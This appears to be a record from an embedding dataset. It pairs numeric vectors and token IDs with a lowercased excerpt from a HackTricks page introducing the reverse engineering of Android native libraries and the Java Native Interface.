0.33805665373802185, -0.008187471888959408, 0.1242775246500969, 0.511321485042572, -0.4806933104991913, 0.31610316038131714, -0.41909757256507874, -0.07883814722299576, -0.2601836025714874, -0.23513339459896088, -0.6655515432357788, -0.16692186892032623, 0.32713019847869873, -0.6869494318962097, 0.16150657832622528, -0.31581375002861023, -0.276584655046463, 0.3671988546848297, -0.13034801185131073, -0.46178922057151794, 0.2593914866447449, 0.35965850949287415, 0.1515093892812729, -0.4440355896949768, 0.2673540711402893, 0.03953413665294647, -0.07187977433204651, -1.0485444068908691, 0.6797657608985901, -0.5298343300819397, 0.2536087930202484, 0.17452237010002136, 0.13592121005058289, 0.2481417953968048, -0.3798707127571106, 0.1962689906358719, 0.598160982131958, -0.5831621885299683, 0.7221751809120178, -0.788754940032959, 0.6903442740440369, 0.2396116852760315, -0.48082152009010315, -0.12215552479028702, -0.27425679564476013, 0.03286221995949745, -0.3237440288066864, 0.037566762417554855, -0.403622567653656, -0.2781001031398773, -0.1728425770998001, 0.3429456353187561, -0.12393122911453247, 0.515953779220581, 0.6263408064842224, 0.5899131298065186, -0.25821802020072937, 0.9903553128242493, -1.2144948244094849, -0.6615168452262878, 0.9029462933540344, -0.5336084365844727, -0.20534390211105347, -0.733747661113739, -0.5043841600418091, -0.019403692334890366, 0.48438549041748047, -0.3772503435611725, 0.23987913131713867, 0.9058653712272644, 0.7760252952575684, 0.5140961408615112, -0.2776821255683899, -0.4057212471961975, -0.09354254603385925, 0.3791438341140747, -0.25968167185783386, -0.8925432562828064, 0.3444255292415619, 0.5647246837615967, 0.5605837106704712, -0.5023419260978699, -0.5450595617294312, -0.33602675795555115, 0.9736271500587463, 0.5173704624176025, 0.6673179268836975, 0.1129591166973114, -0.6665206551551819, 0.8661319017410278, -1.3112889528274536, 0.2038121372461319, -0.17674636840820312, 0.7656360864639282, 0.46673813462257385, 0.1780630201101303, -0.25470438599586487, -0.4261723756790161, -0.25283539295196533, -0.19651556015014648, 0.12230977416038513, 0.17170600593090057, 0.25048062205314636, 0.178083598613739, 0.19396013021469116, 0.03538379818201065, 0.07288376986980438, 0.9325655102729797, 0.4564487338066101, -0.13166320323944092, 0.47706225514411926, 0.4676336944103241, -0.43577954173088074, -0.05874113738536835, 0.19260768592357635, -0.2774212062358856, 0.04285276681184769, -0.06767193973064423, 0.12779271602630615, -0.21146200597286224, -0.2863297760486603, -0.4376812279224396, 0.10984381288290024, -0.8446117043495178, -0.3220849633216858, -1.2651174068450928, -0.34477999806404114, 0.9561182856559753, -0.7333803772926331, 0.3530362546443939, -0.7341303825378418, -0.30241769552230835, 0.5078509449958801, 0.5443590879440308, -0.400394469499588, -0.03878900408744812, 0.40064793825149536, 0.812154233455658, -0.9028332233428955, 1.060562252998352, -0.15101772546768188, -0.081985242664814, 0.37682902812957764, 0.16764050722122192, -0.19195468723773956, 0.24700964987277985, 0.42621910572052, -0.748282790184021, -0.9730497598648071, 0.09974469244480133, 0.6945750117301941, 0.28958916664123535, 0.7291675806045532, 0.2250848263502121, 0.01402466930449009, -0.08565130084753036, -0.06224846839904785, -0.12219538539648056, -0.2935987114906311, 0.6683090925216675, -0.5370683670043945, -0.06231989711523056, 0.6880137324333191, -0.24317996203899384, 0.49175864458084106, -0.04942801594734192, 1.0665544271469116, -0.02430715225636959, 0.6170292496681213, 0.637982189655304, -0.9607646465301514, 0.08754472434520721, 0.42060694098472595, -0.07126522809267044, -0.11363149434328079, 0.14839398860931396, -0.2330893576145172, -0.4592234194278717, -1.0002408027648926, -0.6528097987174988, -0.0048032356426119804, 0.46138012409210205, 0.31809332966804504, -0.25179702043533325, -0.1544487178325653, 0.09520335495471954, -0.8668733835220337, 0.26623597741127014, 1.379868745803833, 0.035330988466739655, -0.44470855593681335, -0.6652442216873169, 0.04803845286369324, -0.07343599945306778, -0.3985067903995514, -0.9729362726211548, -0.13276666402816772, -0.04427744820713997, -0.32669660449028015, -0.27489420771598816, -1.282557487487793, -0.42164674401283264, 0.18559229373931885, -0.4613792896270752, 0.12466941773891449, 0.2936285436153412, 0.5850237011909485, 0.6920205354690552, 0.3867267370223999, -0.15509586036205292, 0.38741129636764526, 0.2575662136077881, 0.9602347016334534, -0.007665866985917091, 1.4494773149490356, 0.19493892788887024, -0.8943786025047302, 0.076335109770298, -0.08872471749782562, 0.34219762682914734, 0.3570306599140167, -0.32886815071105957, -0.07880118489265442, -0.0071709854528307915, -0.7323870658874512, -0.1165686622262001, 0.17726851999759674, 0.9795475006103516, 0.2666356563568115, -0.16812767088413239, -1.2948567867279053, -0.012681142427027225, -0.3864918649196625, 0.17530356347560883, -0.36002251505851746, 0.419080525636673, 0.03346772864460945, -0.07159659266471863, 0.09083084762096405, -1.2930339574813843, 3.864213228225708, 0.6178990602493286, 0.3388700485229492, -0.11625094711780548, 0.9224801063537598, 0.7174158692359924, 0.6125895380973816, -0.09150934219360352, -0.32734978199005127, -0.6162370443344116, 0.2306729555130005, 0.15603584051132202, 0.7466579079627991, 0.15763092041015625, -0.33124876022338867, 0.0070742093957960606, -0.20739313960075378, -0.5587953925132751, -0.2806054949760437, -0.7596700191497803, -0.7021583914756775, -0.05349600687623024, -0.03761182725429535, 0.9251002073287964, 0.09740661084651947, 0.1590711772441864, -0.22680778801441193, -0.9355496764183044, 0.36904478073120117, -0.6658252477645874, 0.8778997659683228, 0.486238032579422, 1.4235941171646118, 0.47412028908729553, 0.01209923718124628, 0.4809102714061737, 0.3986264765262604, -0.020144637674093246, -0.4450933039188385, 0.4645704925060272, -0.4580049514770508, -0.006255513057112694, -0.14862090349197388, -1.5128116607666016, 0.27718880772590637, 0.6737106442451477, -0.6308411359786987, 0.10231085121631622, 0.25335752964019775, -0.6818204522132874, 0.6940529346466064, -0.5449150204658508, 0.09881187975406647, -0.24357153475284576, -0.265575647354126, 0.3738398551940918, -0.35404273867607117, -0.016396652907133102, 0.6508510112762451, 0.21016918122768402, -0.2666168212890625, 1.0574865341186523, -0.5630826950073242, -1.0087287425994873, -0.8971560597419739, 0.9922569394111633, 0.5710811018943787, 0.5385838150978088, -0.19343450665473938, -0.7738584876060486, -0.7701863646507263, 0.15865686535835266, 0.07882058620452881, -0.7689153552055359, 0.2539867162704468, -0.22562211751937866, 0.10289957374334335, 0.7144979238510132, 0.5517473220825195, -1.3090543746948242, -0.15570667386054993, 0.47932249307632446, -0.6886775493621826, -0.07509476691484451, 0.6042714715003967, 0.5822868943214417, -0.4416162967681885, -0.19004470109939575, -0.8652225732803345, 0.8591733574867249, 0.33026400208473206, 0.1991180181503296, 0.07221141457557678, 0.4874981939792633, 0.14941070973873138 ]
[ 2001, 2583, 2000, 2424, 7591, 2524, 1011, 22402, 22496, 1999, 1996, 9262, 22483, 3642, 1012, 3746, 2005, 2695, 102 ]
hack_tricks
422.txt
1
[CLS] reversing native librariesinformation copied from url ( you can find solutions there ) android applications can contain compiled, native libraries. native libraries are code that the developer wrote and then compiled for a specific computer architecture. most often, this means code that is written in c or c + +. the benign, or legitimate, reasons a developer may do this is for mathematically intensive or time sensitive operations, such as graphics libraries. malware developers have begun moving to native code because reverse engineering compiled binaries tends to be a less common skillset than analyzing dex bytecode. this is largely due to dex bytecode can be decompiled to java whereas native, compiled code, often must be analyzed as assembly. goalthe goal of this section is not to teach you assembly ( asm ) or how to reverse engineer compiled code more generally, but instead how to apply the more general binary reverse engineering skills, specifically to android. because the goal of this workshop is not to teach you the asm architectures, all exercises will include an arm and an x86 version of the library to be analyzed so that each person can choose the architecture that they are more comfortable with. learning arm assemblyif you don ’ t have previous binary reverse engineering / assembly experience, here are some suggested resources. most android devices run on arm, but all exercises in this workshop also include an x86 version of the library. to learn and / or review arm assembly, i highly suggest the arm assembly basics from azeria labs. introduction to the java native interface ( jni ) the java native interface ( jni ) allows developers to declare java methods that are implemented in native code ( usually compiled c / c + + ). jni interface is not android - specific, but is available more generally to java applications that run on different platforms. the android native development kit ( ndk ) is the android - specific toolset on top of jni. according to the docs : in android, the native development kit ( ndk ) is a toolset that permits developers to write c and c + + code for their android apps. together, jni and ndk allow android developers to implement some of their app ’ s functionality in native code. the java ( or kotlin ) code will call a java - declared native method which is implemented in the compiled, native library. referencesoracle jni docsjni specificationjni functions < – i always have this one open and refer to it while reversing android native libraries
[ 0.3302064836025238, -0.125348299741745, -0.23414435982704163, 0.10245214402675629, -0.10962745547294617, -0.24322472512722015, -0.18420813977718353, -0.1001148372888565, 0.4186989963054657, 0.5674911737442017, 0.10632198303937912, 0.1744227260351181, -0.019636964425444603, -0.8650804758071899, -0.4064597487449646, -0.21703889966011047, -0.708506166934967, 0.10170169919729233, -1.1665196418762207, 0.19022656977176666, 0.13809175789356232, -0.062675341963768, -1.1046099662780762, -1.1449671983718872, -0.722233235836029, 0.26183778047561646, 1.0131317377090454, -0.15776477754116058, 0.3089587986469269, 0.8022587299346924, 0.8680595755577087, 0.19169609248638153, -0.1885327696800232, -0.4394582509994507, 0.3828393220901489, -0.3434351682662964, 0.6677951216697693, 0.04534878209233284, 0.41226059198379517, -0.6525088548660278, 0.8699902296066284, -0.5156018733978271, 0.35457003116607666, -0.886063814163208, -0.28272587060928345, -0.5407795906066895, 0.0328727662563324, 0.13314536213874817, 0.4937075078487396, -0.34080246090888977, 0.3775060176849365, 0.41086557507514954, 0.061936601996421814, 0.4038749635219574, -0.022532328963279724, 0.47978338599205017, 0.20395228266716003, -0.36513274908065796, -0.5682034492492676, -0.048258110880851746, -0.0841267853975296, 0.5913680791854858, 0.5559778809547424, -0.8947953581809998, 0.32019537687301636, 0.30733615159988403, -0.042932648211717606, -0.16867868602275848, -0.10708073526620865, -0.36232009530067444, -0.7220539450645447, 0.8696696758270264, -0.8189602494239807, -0.5431370139122009, -0.2433643788099289, -0.1968277394771576, -0.2643919289112091, -0.07902224361896515, -0.0818653404712677, 0.46615347266197205, 0.2699534296989441, 0.8743473887443542, -0.01468824502080679, -0.394191712141037, -0.4462127387523651, -0.34369340538978577, 0.4643237292766571, 0.37432175874710083, -1.023956060409546, 0.03907298669219017, 0.11295021325349808, 0.4334390163421631, -0.8400548696517944, 0.12002083659172058, 1.2451715469360352, 0.5324259996414185, -0.5923633575439453, -0.012811391614377499, 0.12362144887447357, -0.2280455082654953, 0.8833652138710022, 0.3835825026035309, 0.33950304985046387, -0.15259569883346558, -0.2987154722213745, -0.03446316346526146, -0.18299070000648499, -0.5830618739128113, 0.18127351999282837, -0.3960072100162506, 0.647517740726471, -0.22061565518379211, 0.5059081315994263, -0.5362874865531921, 0.11947425454854965, 0.9277486205101013, 0.21438004076480865, 0.1672273576259613, -0.2740473747253418, 0.4647631347179413, -0.012433305382728577, -0.05270862579345703, -0.47277164459228516, -0.018342509865760803, 0.3718326687812805, 0.5260968208312988, -0.1673099845647812, 1.102286696434021, -0.2580317258834839, -0.4136905074119568, -0.3065331280231476, -0.12994837760925293, -0.24736995995044708, 0.9370996356010437, -0.24278247356414795, 0.30140677094459534, 0.1721174120903015, 0.06496334075927734, 0.3583846986293793, -1.2274107933044434, 0.3899385631084442, 0.030172457918524742, 0.49103981256484985, 1.6125127077102661, -0.31409168243408203, -0.7347882390022278, -0.3741433620452881, 0.49991223216056824, -0.3595001995563507, 0.21326559782028198, 0.05865120142698288, 0.16723313927650452, 1.0377973318099976, -0.49653080105781555, -0.09794583916664124, 0.2570158839225769, 0.004764657001942396, 0.1936480551958084, 0.4600168466567993, 0.1926773339509964, 0.1565040796995163, 0.5598797798156738, -0.20460495352745056, 0.1758958250284195, 0.021995361894369125, 0.58570796251297, -0.4270618259906769, -0.9573769569396973, -0.015981212258338928, 0.0621984638273716, -0.04530208930373192, 0.21066612005233765, 0.27504968643188477, -0.07776433974504471, 1.7165846824645996, 0.7137221097946167, 0.2648324966430664, -0.0361541286110878, 0.1050400361418724, 0.6622747182846069, -0.14516615867614746, 0.3866879343986511, 0.26729923486709595, 0.6883904337882996, -0.6594008207321167, 0.5716098546981812, 0.04210619255900383, -0.6300926804542542, 0.051298074424266815, -0.09555847197771072, -0.23232358694076538, 0.4724646508693695, -0.5299952030181885, 0.07214654237031937, 0.5792596936225891, 0.1708698272705078, -1.2564890384674072, 0.20917902886867523, -0.6184791326522827, -1.8304823637008667, -0.2499084323644638, 0.38335826992988586, -0.45684701204299927, 0.5060853362083435, -0.9256949424743652, -0.7885040640830994, 0.8450407981872559, 0.608468770980835, 0.16042904555797577, 0.9043691754341125, 0.7122904062271118, 0.10314028710126877, -0.9179338812828064, -0.3059818148612976, -0.28944146633148193, 0.044478755444288254, -0.6832789778709412, -0.07602421194314957, -0.3995410203933716, 0.2494419813156128, 0.08323632925748825, 0.18282608687877655, 0.6464293003082275, 0.2769840657711029, -0.4498886168003082, -0.15039996802806854, 0.5627386569976807, 0.04876058176159859, 0.06344036012887955, -0.3890344500541687, -0.021608080714941025, 0.12455783784389496, 0.6692531704902649, 0.49638622999191284, 0.2669466733932495, -0.28315937519073486, -0.2522641122341156, 0.4544057250022888, 0.00027221316122449934, -0.37915149331092834, -0.5556537508964539, 0.7418139576911926, -0.0142342085018754, 1.033087134361267, 0.6031457781791687, 0.2311038374900818, 0.04266003519296646, 0.1358596533536911, 0.168127179145813, 0.7571060657501221, -0.08116819709539413, 0.5189175009727478, 0.6761994957923889, -0.4902453124523163, -0.450870543718338, -0.8261558413505554, 0.9952387809753418, 0.477899432182312, -0.22032350301742554, -0.5185654163360596, 0.23795267939567566, -0.04020277038216591, -0.16505776345729828, -0.31807592511177063, 0.15381842851638794, 0.7599554061889648, -0.4332028329372406, 0.12611091136932373, -0.2281462401151657, -0.7897732853889465, -1.12501859664917, -0.5800854563713074, -0.8186361193656921, -0.170697420835495, -1.1613447666168213, -0.10103115439414978, 0.830574095249176, -1.0835050344467163, 1.005578637123108, 0.25311940908432007, -0.41584038734436035, -0.2604965567588806, 0.3461093604564667, 0.7984118461608887, 0.2654499411582947, -0.2252465784549713, -0.5771077871322632, 0.1762048453092575, 0.43405577540397644, 0.7651452422142029, -0.05195903778076172, 0.2721385657787323, -0.15385353565216064, 0.40415483713150024, 0.3063315749168396, -0.46357354521751404, 0.18095724284648895, -0.3107278048992157, -0.016915302723646164, -0.08657582849264145, 0.1667293906211853, -0.0540713332593441, 0.2886660695075989, 0.005260676611214876, 0.2279253751039505, 0.14810937643051147, -0.5368221402168274, -0.5038707852363586, 0.3414207696914673, 0.22117860615253448, -0.290903776884079, 0.12159110605716705, -0.3642839193344116, 0.5894252061843872, -0.6168014407157898, 0.06389009952545166, -0.09930247068405151, 0.41484901309013367, -0.3175545632839203, -0.33351293206214905, -0.2813302278518677, -0.8535805344581604, -0.536212146282196, -0.3112459182739258, 0.08166372776031494, 0.4021068811416626, 0.2284441739320755, -1.0486245155334473, 0.3110387623310089, -0.79691082239151, -0.3224141299724579, 0.05367347225546837, 0.1520301252603531, 1.2403264045715332, -0.5692819952964783, 0.7504323720932007, 0.41771385073661804, 0.08972980082035065, -0.19379696249961853, -0.35307827591896057, 0.48408177495002747, -0.18602043390274048, 0.18815039098262787, 0.031867772340774536, 0.22067657113075256, 0.14254769682884216, 0.12257973849773407, -0.06638748198747635, -0.1053643524646759, -0.8456969857215881, -1.0251085758209229, -0.23893098533153534, 0.052734971046447754, 0.532818078994751, 0.4275335371494293, 0.7058480978012085, -0.18739727139472961, -0.542526125907898, -0.0749131292104721, 0.12935195863246918, 0.24626123905181885, 0.5179321765899658, 0.4743410050868988, -0.6205916404724121, -0.7095372080802917, -0.42994844913482666, -0.5417033433914185, 0.3291214406490326, 0.3915344178676605, -0.6704017519950867, 0.8121586441993713, -0.4690612852573395, 0.0021168766543269157, 0.9834221601486206, -0.20060995221138, -0.7325296998023987, 0.933244526386261, -0.16834260523319244, 0.8905369639396667, -0.10904001444578171, 0.2379012107849121, -0.6119931936264038, -0.29815971851348877, 0.46207529306411743, 0.3689526915550232, -0.4393344521522522, -0.10518880933523178, -0.7509660720825195, -0.2693788409233093, -0.23369717597961426, -0.39381566643714905, -0.0714901015162468, 0.16327223181724548, -0.4136737585067749, -0.5841776132583618, -0.5639582872390747, 0.530492901802063, 0.6475000381469727, -0.1851799488067627, 0.7341575622558594, 0.6085624694824219, -0.13031725585460663, -0.25243207812309265, 0.5897082090377808, -0.690118670463562, -0.23962174355983734, 0.18349958956241608, 0.2706538140773773, -0.5309573411941528, -0.14176486432552338, 0.16397954523563385, -0.21888060867786407, -0.8685612082481384, -0.17978209257125854, -0.265177845954895, 0.5334864854812622, -0.33671367168426514, -0.26228174567222595, 0.04010257124900818, 0.4422794580459595, -0.715247631072998, 0.05502977594733238, -0.21700142323970795, 0.8980252742767334, 0.4673864245414734, -0.473803848028183, -0.5698823928833008, -0.6199630498886108, 0.3486790060997009, 0.43221980333328247, 0.15252770483493805, -0.5434948205947876, -0.48224446177482605, 0.24103157222270966, -0.4344649910926819, 0.11846790462732315, 0.29153764247894287, 0.13137494027614594, 0.5979429483413696, -0.832122802734375, -0.25594717264175415, 1.1570535898208618, -0.643837034702301, -0.3052481412887573, 0.11660110950469971, 0.0848662406206131, 0.04078555852174759, 0.22501765191555023, -0.008970358408987522, 0.062428317964076996, -0.10047901421785355, -0.7483981251716614, 0.6277505159378052, -0.6491332650184631, 0.0935276448726654, 0.008691158145666122, -0.05914521589875221, 0.0742029994726181, 0.36531755328178406, -0.3326272964477539, -0.27263978123664856, -0.515750527381897, 0.11762180179357529, -0.35637959837913513, -0.5449823141098022, 0.519741952419281, 0.10969305783510208, -0.018330609425902367, 0.5145580768585205, 0.6355246305465698, -0.0643526241183281, 0.14635051786899567, -0.2060302048921585, -0.5926565527915955, 0.7811709046363831, -0.5889550447463989, 0.8126330375671387, -0.2327985316514969, -0.06055762991309166, -0.2363603562116623, -0.40093135833740234, 0.5639774203300476, 0.33455368876457214, 0.37809282541275024, -1.093778371810913, -0.30743664503097534, -0.5538707971572876, 0.5612282752990723, -0.0331890843808651, 0.6252973079681396, -0.13221992552280426, -0.4872059226036072, -0.4092484712600708, 0.07877795398235321, 0.17484024167060852, -0.748516321182251, 0.007359698414802551, -0.1862352192401886, -0.1292858123779297, -0.0895976573228836, 0.7209277153015137, 0.16424037516117096, -0.20265692472457886, 0.9296460747718811, 0.03711612895131111, 0.13538753986358643, -0.8237584829330444, -0.41437071561813354, -0.39586880803108215, -0.7901490330696106, 0.050737787038087845, -0.2016911506652832, 0.03011825866997242, -0.21785978972911835, 0.03815379738807678, 0.7363666296005249, 0.52436763048172, -0.3247489333152771, -0.7471300363540649, 0.34769871830940247, 0.051635224372148514, -0.019351914525032043, -0.44427040219306946, 0.20229069888591766, -0.14268039166927338, -0.051436346024274826, -0.6393688917160034, -0.10402648895978928, -1.0340059995651245, -0.4394414722919464, -0.09395204484462738, -0.22341890633106232, 0.01847340725362301, -0.33335933089256287, -0.26316308975219727, -0.2124558389186859, 0.6856173872947693, -0.01045217365026474, -0.5530194044113159, -0.3675275146961212, -0.12094411998987198, 0.3705662488937378, 0.020954038947820663, -0.7886004447937012, -0.5884418487548828, -0.8530309200286865, -0.06881458312273026, 1.117045521736145, 0.09701912850141525, 0.05834880843758583, 0.06097705662250519, 0.05422477051615715, 0.03210543096065521, 0.17079085111618042, -0.4281544089317322, -0.30609437823295593, -0.1514280140399933, 0.1639057844877243, 0.11155563592910767, 1.0636379718780518, -0.3956626057624817, 0.23493872582912445, -0.5593402981758118, -0.2681829333305359, 0.14546144008636475, 0.47043296694755554, 0.03347371518611908, -0.17472229897975922, 0.5602420568466187, -0.4482860565185547, -0.48028138279914856, -0.03128116577863693, 0.40194886922836304, 0.27815449237823486, -0.3885524868965149, -0.36784419417381287, 0.2326723337173462, -0.6471095681190491, -0.9662598371505737, 0.9941527247428894, -0.341993123292923, 0.12976400554180145, 0.013257933780550957, -0.0750737190246582, 0.1905979961156845, -0.9542323350906372, -0.16394895315170288, 0.3564622104167938, 0.7073417901992798, 0.28253650665283203, -0.9849786162376404, 0.2877293527126312, 0.6869584918022156, -0.6028133630752563, -0.0888293907046318, -0.27306774258613586, 0.2579575181007385, 0.44776651263237, 0.27887797355651855, -0.2760888934135437, -0.47495993971824646, 0.15247580409049988, 0.7875922918319702, -0.5868151187896729, 0.4555700719356537, 0.858883261680603, -1.4905086755752563, 0.40811875462532043, 0.23674483597278595, -0.2594102919101715, -0.5672053098678589, 0.9334843158721924, 0.2519367039203644, 0.41951629519462585, -0.0026091940235346556, -0.057855065912008286, -0.05937261879444122, 0.185956671833992, 0.7577182650566101, -0.322389155626297, -0.33343809843063354, 0.16040588915348053, 0.34530070424079895, -0.6351611614227295, 0.05940761789679527, -0.7785879969596863, 0.13313956558704376, -0.025108255445957184, -0.4805644750595093, -0.3872269093990326, -0.019129790365695953, 0.07132323086261749, 0.3272843658924103, 0.11512923240661621, 0.04166412726044655, -0.4694240391254425, -0.21883392333984375, 0.4361256957054138, -0.037751782685518265, 0.8949617743492126, 0.12747140228748322, -0.5521804094314575, -0.6468195915222168, -0.24530759453773499, 0.2803969383239746, -0.31731927394866943, -0.3296830654144287, 0.9341509938240051, -0.7945229411125183, 0.5698789358139038, 0.23572473227977753, 0.36933526396751404, 0.716659665107727, 0.18543004989624023, 0.06342143565416336, 0.5530043840408325, -0.4392280876636505, -0.4476454257965088, -0.18634526431560516, 0.3245554566383362, 0.28335291147232056, 0.5635818243026733, -0.1549385040998459, 0.16181129217147827, -0.2854957580566406, 0.44700372219085693, 0.2616250813007355, -0.49599406123161316, -0.4679775536060333, -0.7303417921066284, -0.4757281243801117, 0.8654603362083435, 0.38508540391921997, 0.08793162554502487, 0.28735798597335815, -0.3051527142524719, -0.3953165113925934, -0.09540513157844543, 0.08054016530513763, -0.5064910054206848, 0.05346015840768814, -0.035308726131916046, -0.0664655864238739, -0.6934054493904114, -0.8675358295440674, -0.3493878245353699, 0.10581972450017929, -0.06966688483953476, -0.41112038493156433, -0.6034741997718811, 0.16016680002212524, -0.36319926381111145, 0.7548494338989258, -0.7149523496627808, 0.10774669796228409, -0.1421942114830017, -0.458677738904953, 0.15166378021240234, 0.37766313552856445, -0.20915888249874115, 0.39873674511909485, -0.273813933134079, 0.11110495775938034, -0.0542248897254467, -0.08343509584665298, -0.19173042476177216, -0.036953747272491455, -0.11007994413375854, -0.05085944011807442, -0.0758797749876976, 0.036822184920310974, -0.0045797755010426044, 0.5238317251205444, -0.2549777626991272, -0.6282138824462891, -0.3064194917678833, 0.37122124433517456, -0.15143485367298126, -0.10855162143707275, 0.5160402059555054, 1.029950499534607, 0.4701843559741974, -0.17094723880290985, -0.5770828723907471, 0.2035703957080841, 0.9241313934326172, 0.3179047107696533, 0.7127714157104492, 0.31781601905822754, 0.6809946894645691, -1.0197911262512207, -0.030626976862549782, 0.11651279032230377, -0.8721836805343628, 0.08902852982282639, -0.24934232234954834, 0.4587804675102234, -0.38337698578834534, 0.19822955131530762, -0.13733592629432678, -0.18366949260234833, 0.9631537199020386, -0.21620988845825195, 0.09609789401292801, 0.052271950989961624, -0.4194529354572296, -0.07700599730014801, -0.680669903755188, -0.553713858127594, 0.010865072719752789, -1.0237551927566528, -0.1491672694683075, -0.2384652942419052, 0.25525522232055664, 0.0006670851144008338, 0.06844707578420639, -0.18822909891605377, 0.03264167159795761, -0.34892240166664124, 0.09538127481937408, 0.8026689291000366, -1.149030089378357, -0.43548351526260376, -0.2927568256855011, 0.4497651755809784, -0.54262375831604, -0.8127787113189697, -0.12455620616674423, 0.922266960144043, -0.12648269534111023, -0.2826589047908783, -0.7136098742485046, -0.0874067172408104, 0.16319970786571503, 0.4017384648323059, -0.2708663046360016, 0.20134538412094116, -0.7250557541847229, 0.7092121839523315, -0.48908695578575134, 0.1057463213801384, -0.5746617913246155, -0.020908821374177933, 0.6452277898788452, 0.5623427629470825, -0.150190532207489, 0.977669894695282, 0.9043890833854675, -0.1583126336336136, 0.8338642120361328, 0.5295475721359253, 0.5714324712753296, -0.13493457436561584, -0.13711604475975037, -0.34647026658058167, -0.14929619431495667, -0.2686184346675873, 0.3847644031047821, 0.1750791221857071, 0.352946013212204, 0.046354249119758606, -0.51186603307724, 0.35511332750320435, 0.5401728749275208, 0.12663304805755615, -0.4712606966495514, -0.27720993757247925, -0.3505333364009857, -0.17672909796237946, 0.5911808013916016, -0.3346960246562958, 0.41713282465934753, -0.19936583936214447, 0.26294124126434326, 0.1782936155796051, 0.010611621662974358, 0.6635863780975342, -1.1990306377410889, 0.5786452293395996, -0.40928351879119873, 0.37125274538993835, 0.3343175947666168, 0.3719150722026825, -0.5531845092773438, 0.23922796547412872, 0.8197363615036011, 0.37734413146972656, -0.12047360092401505, 1.0967645645141602, -0.30530858039855957, 0.1030924916267395, 0.2789047360420227, -0.08655785769224167, -0.293569952249527, 0.12271806597709656, 0.5948993563652039, -0.15313886106014252, -0.6878071427345276, 0.47284120321273804, 0.46212899684906006, -0.7466031908988953, 0.19761550426483154, 0.06319612264633179, 0.13506893813610077, -0.5232437252998352, 0.11349405348300934, -0.17969538271427155, -0.24565258622169495, 0.6756376624107361, -0.6906923055648804, -0.7050709128379822, 0.621209442615509, 0.14830772578716278, 0.2853946387767792, 0.13315199315547943, 0.7480518817901611, -0.47984471917152405, 0.7466797828674316, 0.35579541325569153, -0.41067028045654297, -0.7309694886207581, -0.4610418677330017, 0.09414144605398178, -0.550963282585144, -0.013421108014881611, -0.3903432786464691, 0.564673900604248, 0.1050710454583168, -0.735032856464386, -0.4642711877822876, -0.1048431247472763, -0.527298092842102, -0.38969355821609497, 0.6703324913978577, 0.11994832009077072, -0.63275545835495, -0.0615750253200531, -0.27050456404685974, 0.12405751645565033, 0.561872124671936, -0.6869544386863708, -0.5315843820571899, -0.71321702003479, -0.5676955580711365, -0.28319376707077026, 1.274969220161438, -0.8728236556053162, -0.5805912017822266, 0.46583670377731323, -0.6220976114273071, -0.4742157757282257, -0.3299928307533264, -0.3641491234302521, -0.6175904870033264, 0.6845937967300415, 0.418399453163147, 0.13531439006328583, 0.6601585745811462, -0.7643282413482666, 0.02548716962337494, 0.2536120116710663, 1.0966323614120483, -0.14122425019741058, 0.9132554531097412, 0.6839579939842224, 0.29361826181411743, -0.10238811373710632, -0.013440961018204689, 0.5101383924484253, -0.6309311985969543, -0.3476267158985138, 0.21203237771987915, 0.05177948251366615, -0.40020817518234253, -0.36655092239379883, 0.20745369791984558, -0.24004647135734558, 0.3993282616138458, 0.14204847812652588, -1.2378214597702026, -0.025860192254185677, -0.7289504408836365, 0.39620280265808105, -0.03000025823712349, -0.007519493345171213, 0.34689050912857056, 0.2981598973274231, 0.579621434211731, -1.1000113487243652, 4.407304286956787, 0.5880240797996521, -0.04172892868518829, 0.44611045718193054, 0.21594586968421936, 0.8830463886260986, 0.7730755805969238, -0.5506153702735901, 0.5493329763412476, -0.7742452025413513, 0.4753437340259552, -0.942267894744873, 0.40486955642700195, 0.8790268301963806, -0.31215542554855347, 0.0639692023396492, -0.28748437762260437, 0.21971024572849274, 0.3301478624343872, -1.0717487335205078, -1.32896888256073, 0.5599799156188965, -0.167888343334198, -0.320531964302063, 0.39533883333206177, 0.30554720759391785, -0.08524301648139954, -0.5666314959526062, 0.2066437304019928, -0.29312780499458313, -0.23496279120445251, -0.22055812180042267, 0.19023551046848297, 0.19955573976039886, -0.3865707218647003, -0.4192221760749817, -0.49357083439826965, -0.6363939642906189, 0.04484241083264351, 0.5621121525764465, -0.2545114755630493, 0.2618776857852936, 0.07146595418453217, -0.2898310124874115, 0.44182056188583374, 0.41746804118156433, -0.2740478813648224, 0.2642885148525238, 0.36059072613716125, -0.6056678295135498, 0.5767402648925781, 0.02222316712141037, 0.02110658399760723, 0.2575037479400635, -0.22705867886543274, -0.19116485118865967, 0.15333260595798492, -0.30494868755340576, -0.005268277134746313, -0.5395503044128418, 0.17240118980407715, -0.48929449915885925, -0.03295699134469032, 0.0725807473063469, -1.1052560806274414, 0.651128888130188, -0.6599658131599426, 0.3220134973526001, -0.040159255266189575, -0.2897559702396393, -0.12969961762428284, 0.09768622368574142, -0.1713198572397232, -0.028114885091781616, 0.7776722311973572, 0.24097269773483276, 0.0412098690867424, -0.09293545037508011, 0.06126425415277481, -0.23564717173576355, 0.1486789882183075, -0.35151970386505127, -0.2568931579589844, 0.7507625818252563, 0.9841982126235962, 0.9524120688438416, -0.4400636851787567, 0.10399467498064041, 0.07897157222032547, 0.6283928155899048, 0.32677924633026123, 0.3820318579673767, 0.2723718285560608, 0.05603986978530884, -0.12033451348543167 ]
[ 101, 7065, 2545, 2075, 3128, 8860, 2378, 14192, 3370, 15826, 2013, 24471, 2140, 1006, 2017, 2064, 2424, 7300, 2045, 1007, 11924, 5097, 2064, 5383, 9227, 1010, 3128, 8860, 1012, 3128, 8860, 2024, 3642, 2008, 1996, 9722, 2626, 1998, 2059, 9227, 2005, 1037, 3563, 3274, 4294, 1012, 2087, 2411, 1010, 2023, 2965, 3642, 2008, 2003, 2517, 1999, 1039, 2030, 1039, 1009, 1009, 1012, 1996, 28378, 1010, 2030, 11476, 1010, 4436, 1037, 9722, 2089, 2079, 2023, 2003, 2005, 8045, 2135, 11806, 2030, 2051, 7591, 3136, 1010, 2107, 2004, 8389, 8860, 1012, 15451, 8059, 9797, 2031, 5625, 3048, 2000, 3128, 3642, 2138, 7901, 3330, 9227, 8026, 12086, 12102, 2000, 2022, 1037, 2625, 2691, 4813, 3388, 2084, 20253, 20647, 24880, 16044, 1012, 2023, 2003, 4321, 2349, 2000, 20647, 24880, 16044, 2064, 2022, 21933, 8737, 18450, 2000, 9262, 6168, 3128, 1010, 9227, 3642, 1010, 2411, 2442, 2022, 16578, 2004, 3320, 1012, 3125, 10760, 3125, 1997, 2023, 2930, 2003, 2025, 2000, 6570, 2017, 3320, 1006, 2004, 2213, 1007, 2030, 2129, 2000, 